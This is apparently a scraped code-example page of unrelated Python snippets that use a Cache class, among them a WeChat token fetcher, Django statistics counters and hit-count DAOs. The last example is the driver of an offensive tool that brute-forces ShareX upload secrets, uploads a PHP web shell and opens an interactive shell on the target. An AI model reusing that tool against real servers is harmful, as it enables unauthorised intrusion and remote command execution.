Ejemplo n.º 1
0
class Token:
    TOKEN_KEY = "wechat_token_key"
    URL_TEMPLATE = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={0}&secret={1}"
    RESPONSE_KEY = "access_token"
    EXPIRE_KEY = "expires_in"

    cache = None

    def __init__(self):
        self.cache = Cache()

    def fetch(self):
        access_token = self.cache.get(self.TOKEN_KEY)
        if access_token is None or len(access_token) == 0:
            print("Token has been expired, try fetching new one.")
            # refresh token
            response = HttpUtils.get(url=self.URL_TEMPLATE.format(
                Config.get("app_id"), Config.get("app_secret")),
                                     return_raw=True)
            if response is not None:
                resp_json = json.loads(str(response.text))
                access_token = resp_json[self.RESPONSE_KEY]
                expire_time = resp_json[self.EXPIRE_KEY]
                print("Fetch done, " + access_token)
                self.cache.set_with_expire(self.TOKEN_KEY, access_token,
                                           expire_time)

        return access_token
Ejemplo n.º 2
0
 def get_total_visualizations(self):
     c = Cache(db=0)
     total_visualizations = c.get('my_total_visualizations_' + str(self.id))
     if not total_visualizations:
         total_visualizations = Visualization.objects.filter(user=self.id).count()
         if total_visualizations > 0:
             c.set('my_total_visualizations_' + str(self.id), total_visualizations, settings.REDIS_STATS_TTL)
     return total_visualizations
Ejemplo n.º 3
0
 def get_total_datastreams(self):
     c = Cache(db=0)
     total_datastreams = c.get('my_total_datastreams_' + str(self.id))
     if not total_datastreams:
         total_datastreams = DataStream.objects.filter(user=self.id).count()
         if total_datastreams > 0:
             c.set('my_total_datastreams_' + str(self.id), total_datastreams, settings.REDIS_STATS_TTL)
     return total_datastreams
Ejemplo n.º 4
0
 def get_total_visualizations(self):
     c = Cache(db=0)
     total_visualizations = c.get('my_total_visualizations_' + str(self.id))
     if not total_visualizations:
         total_visualizations = Visualization.objects.filter(user=self.id).count()
         if total_visualizations > 0:
             c.set('my_total_visualizations_' + str(self.id), total_visualizations, settings.REDIS_STATS_TTL)
     return total_visualizations
Ejemplo n.º 5
0
 def get_total_datastreams(self):
     c = Cache(db=0)
     total_datastreams = c.get('my_total_datastreams_' + str(self.id))
     if not total_datastreams:
         total_datastreams = DataStream.objects.filter(user=self.id).count()
         if total_datastreams > 0:
             c.set('my_total_datastreams_' + str(self.id), total_datastreams, settings.REDIS_STATS_TTL)
     return total_datastreams
Ejemplo n.º 6
0
 def get_total_datasets(self):
     c = Cache(db=0)
     users = User.objects.filter(account=self)
     total_datasets = c.get('account_total_datasets_' + str(self.id))
     if not total_datasets:
         total_datasets =  Dataset.objects.filter(user__in=users).count()
         if total_datasets > 0:
             c.set('account_total_datasets_' + str(self.id), total_datasets, settings.REDIS_STATS_TTL)
     return total_datasets
Ejemplo n.º 7
0
def workspace_open_data_metrics(auth_manager):
    from core.cache import Cache
    from datetime import date, timedelta
    from django.db import connection
    cursor = connection.cursor()

    user_id = auth_manager.id
    account_id = auth_manager.account_id
    language = auth_manager.language

    last_7_days = date.today() - timedelta(days=7)
    c = Cache(db=0)

    published_datasets = c.get('published_datasets_' + str(account_id))
    if not published_datasets:
        cursor.execute("SELECT COUNT(1) as val FROM ao_datasets d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_dataset_revisions b WHERE b.dataset_id = d.id AND NOT EXISTS(SELECT * FROM ao_dataset_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.dataset_id = c.dataset_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_datasets = row[0]
        c.set('published_datasets_' + str(account_id), published_datasets, settings.REDIS_STATS_TTL)

    total_datasets = c.get('total_datasets_' + str(account_id))
    if not total_datasets:
        total_datasets = Dataset.objects.filter(user__account=account_id).count()
        c.set('total_datasets_' + str(account_id), total_datasets, settings.REDIS_STATS_TTL)

    published_datastreams = c.get('published_datastreams_' + str(account_id))
    if not published_datastreams:
        cursor.execute("SELECT COUNT(1) as val FROM ao_datastreams d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_datastream_revisions b WHERE b.datastream_id = d.id AND NOT EXISTS(SELECT * FROM ao_datastream_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.datastream_id = c.datastream_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_datastreams = row[0]
        c.set('published_datastreams_' + str(account_id), published_datastreams, settings.REDIS_STATS_TTL)

    total_datastreams = c.get('total_datastreams_' + str(account_id))
    if not total_datastreams:
        total_datastreams = DataStream.objects.filter(user__account=account_id).count()
        c.set('total_datastreams_' + str(account_id), total_datastreams, settings.REDIS_STATS_TTL)

    published_dashboards = c.get('published_dashboards_' + str(account_id))
    if not published_dashboards:
        cursor.execute("SELECT COUNT(1) as val FROM ao_dashboards d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_dashboard_revisions b WHERE b.dashboard_id = d.id AND NOT EXISTS(SELECT * FROM ao_dashboard_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.dashboard_id = c.dashboard_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_dashboards = row[0]
        c.set('published_dashboards_' + str(account_id), published_dashboards, settings.REDIS_STATS_TTL)

    published_visualizations = c.get('published_visualizations_' + str(account_id))
    if not published_visualizations:
        cursor.execute("SELECT COUNT(1) as val FROM ao_visualizations d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_visualizations_revisions b WHERE b.visualization_id = d.id AND NOT EXISTS(SELECT * FROM ao_visualizations_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.visualization_id = c.visualization_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_visualizations = row[0]
        c.set('published_visualizations_' + str(account_id), published_visualizations, settings.REDIS_STATS_TTL)

    total_visualizations = c.get('total_visualizations_' + str(account_id))
    if not total_visualizations:
        total_visualizations = Visualization.objects.filter(user__account=account_id).count()
        c.set('total_visualizations_' + str(account_id), total_visualizations, settings.REDIS_STATS_TTL)

    return locals()
Ejemplo n.º 8
0
 def get_total_datasets(self):
     c = Cache(db=0)
     users = User.objects.filter(account=self)
     total_datasets = c.get('account_total_datasets_' + str(self.id))
     if not total_datasets:
         total_datasets =  Dataset.objects.filter(user__in=users).count()
         #if settings.DEBUG: logger.info('get_total_datasets from database %d' % total_datasets)
         if total_datasets > 0:
             c.set('account_total_datasets_' + str(self.id), total_datasets, settings.REDIS_STATS_TTL)
     #else:
     #    if settings.DEBUG: logger.info('get_total_datasets from cache %s' % total_datasets)
         
     return total_datasets
Ejemplo n.º 9
0
 def get_total_datasets(self):
     c = Cache(db=0)
     users = User.objects.filter(account=self)
     total_datasets = c.get('account_total_datasets_' + str(self.id))
     if not total_datasets:
         total_datasets =  Dataset.objects.filter(user__in=users).count()
         if settings.DEBUG: logger.info('get_total_datasets from database %d' % total_datasets)
         if total_datasets > 0:
             c.set('account_total_datasets_' + str(self.id), total_datasets, settings.REDIS_STATS_TTL)
     else:
         if settings.DEBUG: logger.info('get_total_datasets from cache %s' % total_datasets)
         
     return total_datasets
Ejemplo n.º 10
0
def invoke(query, output=None):

    if not output:
        output = 'json'
        query['pOutput'] = output.upper()

    content_type = settings.CONTENT_TYPES.get(output)

    try:
        engine_domain = get_domain_with_protocol('engine')
        url = engine_domain + settings.END_POINT_SERVLET

        memcached = settings.MEMCACHED_ENGINE_END_POINT
        if memcached:
            engine_cache = memcache.Client(memcached, debug=0)
            if engine_cache:
                key = str(hash(frozenset(sorted(query.items()))))
                value = engine_cache.get(key)
                if value is None:
                    value, content_type = _request(query, url)
                    engine_cache.set(key, value, settings.MEMCACHED_DEFAULT_TTL)
                    return value, content_type
                else:
                    return value, content_type
            else:
                logger = logging.getLogger(__name__)
                logger.debug('No memcached client could be created. Dataview will be retrieved from engine.')

        return _request(query, url)

    except Exception, e:
        """ TOO much logging from here
        logger = logging.getLogger(__name__)
        logger.debug('{0}. Dataview will be retrieved from redis '.format(str(e)))
        """

        if output == 'json':
            if 'pFilter0' not in query:

                dataviews_cache = Cache(db=settings.CACHE_DATABASES['dataviews'])
                key = str(query.get('pId'))
                params = [ query[arg].decode('utf-8') for arg in sorted(query.keys()) if arg.startswith('pArgument')]
                if params:
                    key += u'::' + u':'.join(params)

                return dataviews_cache.get(key), content_type

        return None, content_type
Ejemplo n.º 11
0
class VisualizationHitsDAO:
    """class for manage access to Hits in DB and index"""

    doc_type = "vz"
    from_cache = False

    # cache ttl, 1 hora
    TTL = 3600

    def __init__(self, visualization):
        self.visualization = visualization
        self.search_index = ElasticsearchIndex()
        self.logger = logging.getLogger(__name__)
        self.cache = Cache()

    def add(self, channel_type):
        """agrega un hit al datastream. """

        try:
            hit = VisualizationHits.objects.create(
                visualization_id=self.visualization.visualization_id, channel_type=channel_type
            )
        except IntegrityError:
            # esta correcto esta excepcion?
            raise VisualizationNotFoundException()

        self.logger.info("VisualizationHitsDAO hit! (guid: %s)" % (self.datastream.guid))

        # armo el documento para actualizar el index.
        doc = {
            "docid": "%s::%s" % (self.doc_type.upper(), self.visualization.guid),
            "type": self.doc_type,
            "script": "ctx._source.fields.hits+=1",
        }

        return self.search_index.update(doc)

    def count(self):
        return VisualizationHits.objects.filter(visualization_id=self.visualization.visualization_id).count()

    def _get_cache(self, cache_key):

        cache = self.cache.get(cache_key)

        return cache

    def _set_cache(self, cache_key, value):

        return self.cache.set(cache_key, value, self.TTL)

    def count_by_day(self, day):
        """retorna los hits de un día determinado"""

        # si es datetime, usar solo date
        if type(day) == type(datetime.today()):
            day = day.date()

        cache_key = "%s_hits_%s_by_date_%s" % (self.doc_type, self.visualization.guid, str(day))

        hits = self._get_cache(cache_key)

        # si el día particular no esta en el caché, lo guarda
        # salvo que sea el parametro pasado sea de hoy, lo guarda en el cache pero usa siempre el de la DB
        if not hits or day == date.today():
            hits = VisualizationHits.objects.filter(
                visualization=self.visualization, created_at__startswith=day
            ).count()

            self._set_cache(cache_key, hits)

        return (date, hits)

    def count_by_days(self, day=30, channel_type=None):
        """trae un dict con los hits totales de los ultimos day y los hits particulares de los días desde day hasta today"""

        # no sé si es necesario esto
        if day < 1:
            return {}

        cache_key = "%s_hits_%s_%s" % (self.doc_type, self.visualization.guid, day)

        if channel_type:
            cache_key += "_channel_type_%s" % channel_type

        hits = self._get_cache(cache_key)

        # me cachendié! no esta en la cache
        if not hits:
            # tenemos la fecha de inicio
            start_date = datetime.today() - timedelta(days=day)

            # tomamos solo la parte date
            truncate_date = connection.ops.date_trunc_sql("day", "created_at")

            qs = VisualizationHits.objects.filter(visualization=self.visualization, created_at__gte=start_date)

            if channel_type:
                qs = qs.filter(channel_type=channel_type)

            hits = (
                qs.extra(select={"_date": truncate_date, "fecha": "DATE(created_at)"})
                .values("fecha")
                .order_by("created_at")
                .annotate(hits=Count("created_at"))
            )

            control = [date.today() - timedelta(days=x) for x in range(day - 1, 0, -1)]
            control.append(date.today())

            for i in hits:
                try:
                    control.remove(i["fecha"])
                except ValueError:
                    pass

            hits = list(hits)

            for i in control:
                hits.append({"fecha": i, "hits": 0})

            hits = sorted(hits, key=lambda k: k["fecha"])

            # transformamos las fechas en isoformat
            hits = map(self._date_isoformat, hits)

            # lo dejamos, amablemente, en la cache!
            self._set_cache(cache_key, json.dumps(hits, cls=DjangoJSONEncoder))

            self.from_cache = False
        else:
            hits = json.loads(hits)
            self.from_cache = True

        return hits

    def _date_isoformat(self, row):
        row["fecha"] = row["fecha"].isoformat()
        return row
Ejemplo n.º 12
0
class DatastreamHitsDAO():
    """class for manage access to Hits in DB and index"""

    doc_type = "ds"
    from_cache = False

    # cache ttl, 1 hora
    TTL=3600 

    def __init__(self, datastream):
        self.datastream = datastream
        #self.datastream_revision = datastream.last_published_revision
        self.search_index = ElasticsearchIndex()
        self.logger=logging.getLogger(__name__)
        self.cache=Cache()

    def add(self,  channel_type):
        """agrega un hit al datastream. """

        # TODO: Fix temporal por el paso de DT a DAO.
        # Es problema es que por momentos el datastream viene de un queryset y otras veces de un DAO y son objetos
        # distintos
        try:
            datastream_id = self.datastream.datastream_id
        except:
            datastream_id = self.datastream['datastream_id']

        try:
            guid = self.datastream.guid
        except:
            guid = self.datastream['guid']

        try:
            hit=DataStreamHits.objects.create(datastream_id=datastream_id, channel_type=channel_type)
        except IntegrityError:
            # esta correcto esta excepcion?
            raise DataStreamNotFoundException()

        self.logger.info("DatastreamHitsDAO hit! (guid: %s)" % ( guid))

        # armo el documento para actualizar el index.
        doc={'docid':"DS::%s" % guid,
                "type": "ds",
                "script": "ctx._source.fields.hits+=1"}

        return self.search_index.update(doc)

    def count(self):
        return DataStreamHits.objects.filter(datastream_id=self.datastream['datastream_id']).count()

    def _get_cache(self, cache_key):

        cache=self.cache.get(cache_key)

        return cache

    def _set_cache(self, cache_key, value):

        return self.cache.set(cache_key, value, self.TTL)

    def count_by_days(self, day=30, channel_type=None):
        """trae un dict con los hits totales de los ultimos day y los hits particulares de los días desde day hasta today"""

        # no sé si es necesario esto
        if day < 1:
            return {}

        cache_key="%s_hits_%s_%s" % ( self.doc_type, self.datastream.guid, day)

        if channel_type:
            cache_key+="_channel_type_%s" % channel_type

        hits = self._get_cache(cache_key)

        # me cachendié! no esta en la cache
        if not hits :
            # tenemos la fecha de inicio
            start_date=datetime.today()-timedelta(days=day)

            # tomamos solo la parte date
            truncate_date = connection.ops.date_trunc_sql('day', 'created_at')

            qs=DataStreamHits.objects.filter(datastream=self.datastream,created_at__gte=start_date)

            if channel_type:
                qs=qs.filter(channel_type=channel_type)

            hits=qs.extra(select={'_date': truncate_date, "fecha": 'DATE(created_at)'}).values("fecha").order_by("created_at").annotate(hits=Count("created_at"))

            control=[ date.today()-timedelta(days=x) for x in range(day-1,0,-1)]
            control.append(date.today())
            
            for i in hits:
                try:
                    control.remove(i['fecha'])
                except ValueError:
                    pass

            hits=list(hits)
                
            for i in control:
                hits.append({"fecha": i, "hits": 0})

            hits = sorted(hits, key=lambda k: k['fecha']) 

            # transformamos las fechas en isoformat
            hits=map(self._date_isoformat, hits)

            # lo dejamos, amablemente, en la cache!
            self._set_cache(cache_key, json.dumps(hits, cls=DjangoJSONEncoder))

            self.from_cache=False
        else:
            hits=json.loads(hits)
            self.from_cache = True

        return hits

    def _date_isoformat(self, row):
        row['fecha']=row['fecha'].isoformat()
        return row
Ejemplo n.º 13
0
def workspace_open_data_metrics(auth_manager):
    from core.cache import Cache
    from datetime import date, timedelta
    from django.db import connection
    cursor = connection.cursor()

    user_id = auth_manager.id
    account_id = auth_manager.account_id
    language = auth_manager.language

    last_7_days = date.today() - timedelta(days=7)
    c = Cache(db=0)

    published_datasets = c.get('published_datasets_' + str(account_id))
    if not published_datasets:
        cursor.execute(
            "SELECT COUNT(1) as val FROM ao_datasets d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_dataset_revisions b WHERE b.dataset_id = d.id AND NOT EXISTS(SELECT * FROM ao_dataset_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.dataset_id = c.dataset_id) AND b.status = 3)",
            [str(account_id)])
        row = cursor.fetchone()
        published_datasets = row[0]
        c.set('published_datasets_' + str(account_id), published_datasets,
              settings.REDIS_STATS_TTL)

    total_datasets = c.get('total_datasets_' + str(account_id))
    if not total_datasets:
        total_datasets = Dataset.objects.filter(
            user__account=account_id).count()
        c.set('total_datasets_' + str(account_id), total_datasets,
              settings.REDIS_STATS_TTL)

    published_datastreams = c.get('published_datastreams_' + str(account_id))
    if not published_datastreams:
        cursor.execute(
            "SELECT COUNT(1) as val FROM ao_datastreams d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_datastream_revisions b WHERE b.datastream_id = d.id AND NOT EXISTS(SELECT * FROM ao_datastream_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.datastream_id = c.datastream_id) AND b.status = 3)",
            [str(account_id)])
        row = cursor.fetchone()
        published_datastreams = row[0]
        c.set('published_datastreams_' + str(account_id),
              published_datastreams, settings.REDIS_STATS_TTL)

    total_datastreams = c.get('total_datastreams_' + str(account_id))
    if not total_datastreams:
        total_datastreams = DataStream.objects.filter(
            user__account=account_id).count()
        c.set('total_datastreams_' + str(account_id), total_datastreams,
              settings.REDIS_STATS_TTL)

    published_visualizations = c.get('published_visualizations_' +
                                     str(account_id))
    if not published_visualizations:
        cursor.execute(
            "SELECT COUNT(1) as val FROM ao_visualizations d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_visualizations_revisions b WHERE b.visualization_id = d.id AND NOT EXISTS(SELECT * FROM ao_visualizations_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.visualization_id = c.visualization_id) AND b.status = 3)",
            [str(account_id)])
        row = cursor.fetchone()
        published_visualizations = row[0]
        c.set('published_visualizations_' + str(account_id),
              published_visualizations, settings.REDIS_STATS_TTL)

    total_visualizations = c.get('total_visualizations_' + str(account_id))
    if not total_visualizations:
        total_visualizations = Visualization.objects.filter(
            user__account=account_id).count()
        c.set('total_visualizations_' + str(account_id), total_visualizations,
              settings.REDIS_STATS_TTL)

    return locals()
Ejemplo n.º 14
0
class Model:
    def __init__(self, clsobj=XParcel):
        self.__db = DB()
        self.__cache = Cache()
        self.__clsobj = clsobj
        self.maxCount = 4096

    def open(self, filepath, mode='w'):
        self.mode = mode
    	intMode = {'r':DB_RDONLY, 'w':DB_CREATE|DB_TRUNCATE, 'a':DB_CREATE}[mode]
        self.__db.setcache(256*1024*1024, 0)
        return self.__db.open(filepath, intMode)

    def close(self):
        self.sync()
        self.__db.close()

    def put(self, key, data):    
        self.__cache.put(key, data)
        self.__measure()

    def get(self, key):
        value = self.__cache.get(key)
        if not value:
            value = self.db_get(key)
            if value:
                self.__cache.put(key, value)
                self.__measure()
        return value

    def keys(self):
        self.sync()
        cursor = self.__db.cursor()
        result = cursor.get(None, DB_FIRST|XDB_NOT_RETRIEVE_VAL)
        while result:
            if not result[0].startswith('__'):
                yield result[0]
            result = cursor.get(None, DB_NEXT|XDB_NOT_RETRIEVE_VAL)
        cursor.close()

    def values(self):
        self.sync()
        cursor = self.__db.cursor()
        result = cursor.get(None, DB_FIRST)
        while result:
            if not result[0].startswith('__'):
                obj = self.__clsobj()
                obj.unpack(result[1])
                yield obj
            result = cursor.get(None, DB_NEXT)
        cursor.close()
        
    def sync(self):
        for key, value in self.__cache.items():
            self.db_put(key, value)

    def items(self):
        self.__cache.cache_sync()
        cursor = self.__db.cursor()
        result = cursor.get(None, DB_FIRST)
        while result:
            if not result[0].startswith('__'):
                obj = self.__clsobj()
                obj.unpack(result[1])
                yield result[0], obj
            result = cursor.get(None, DB_NEXT)
        cursor.close()
        
    def __measure(self):
        while len(self.__cache) > self.maxCount:
            #print len(self.__cache), self.__cache.__dict__
            key, value = self.__cache.top()
            self.db_put(key, value)
            self.__cache.pop()

    def db_get(self, key):
        result = self.__db.get(key, 0)
        if result:
            obj = self.__clsobj()
            obj.unpack(result[1])
            return obj
        return None

    def db_put(self, key, data):
        if self.mode != 'r':
            return self.__db.put(key, data.pack(), 0)
Ejemplo n.º 15
0
def main():
    if os.name == 'nt':
        import colorama
        colorama.init(convert=True)

    Banner.print()

    Logger.warning('use with caution. you are responsible for your actions')
    Logger.warning(
        'developer assume no liability and is not responsible for any misuse or damage'
    )

    Logger.empty_line()

    parser = argparse.ArgumentParser(usage='%(prog)s [options]')
    parser.error = Logger.error

    parser.add_argument('-v',
                        '--verbose',
                        help='verbose',
                        dest='verbose',
                        action='store_true')
    parser.add_argument('-s',
                        '--secret',
                        help='sharex secret key',
                        dest='secret',
                        metavar='')
    parser.add_argument('--form-name',
                        help='multipart file form name',
                        dest='form_name',
                        metavar='',
                        default='sharex')
    parser.add_argument('--field-name',
                        help='sharex secret key post data field name',
                        dest='field_name',
                        metavar='',
                        default='secret')
    parser.add_argument('--no-cache',
                        help='disable cache',
                        dest='cache_enabled',
                        action='store_false')

    mandatory_group = parser.add_argument_group('mandatory arguments')
    mandatory_group.add_argument('-u',
                                 '--url',
                                 help='target url',
                                 dest='url',
                                 metavar='',
                                 required=True)

    brute_group = parser.add_argument_group('brute force arguments')
    brute_group.add_argument('--brute-endpoint',
                             help='brute force file upload endpoint',
                             dest='brute_endpoint',
                             action='store_true')
    brute_group.add_argument('--brute-secret',
                             help='brute force sharex secret key',
                             dest='brute_secret',
                             action='store_true')
    brute_group.add_argument(
        '--brute-field',
        help='brute force sharex secret key post data field name',
        dest='brute_field',
        action='store_true')
    brute_group.add_argument('--brute-form',
                             help='brute force multipart file form name',
                             dest='brute_form',
                             action='store_true')

    if len(sys.argv) == 1:
        parser.print_help()
        return

    args = parser.parse_args()

    if not Validate.url(args.url):
        Logger.error(f'invalid url: {args.url}')

    if not Validate.active_url(args.url):
        Logger.error('target is offline')

    Logger.success('target is online')

    cached_shell_url = Cache.get(args.url) if args.cache_enabled else None

    if cached_shell_url is not None:
        Logger.info('shell url fetched from cache')
        shell_url = cached_shell_url['shell_url']
    else:
        url = args.url
        field_name = args.field_name
        secret = args.secret
        form_name = args.form_name

        if args.brute_endpoint:
            if args.verbose:
                Logger.info('brute forcing endpoint...')

            url = Brute.endpoint(url)

            if url is None:
                Logger.error('endpoint not found')

            Logger.success(f'endpoint found: \x1b[95m{url}')

        if Brute.is_required(
                url
        ):  # checks if it's necessary to brute force secret key POST data field name and secret key
            if args.brute_field:
                if args.verbose:
                    Logger.info('brute forcing secret key field name...')

                field_name = Brute.field_name(url)

                if field_name is None:
                    Logger.error('field name not found')

                Logger.success(f'field name found: \x1b[95m{field_name}')

            if args.brute_secret:
                if args.verbose:
                    Logger.info('brute forcing secret key...')

                secret = Brute.secret(url, field_name)

                if secret is None:
                    Logger.error('secret not found')

                Logger.success(f'secret found: \x1b[95m{secret}')

        if args.brute_form:
            if args.verbose:
                Logger.info('brute forcing multipart form name...')

            form_name = Brute.form_name(url, secret, field_name)

            if form_name is None:
                Logger.error('form name not found')

            Logger.success(f'form name found: \x1b[95m{form_name}')

        if args.verbose:
            Logger.info('attempting to upload php web shell...')

        try:
            shell_url = Exploit.upload_shell(
                url, form_name, secret, field_name, args.verbose,
                args.cache_enabled
            )  # program will exit if an error occurs (shell_url cannot be None)
        except Exception:
            Logger.error(
                f'an error occurred while attempting to upload php web shell on target site'
            )

    Shell.command_line(shell_url)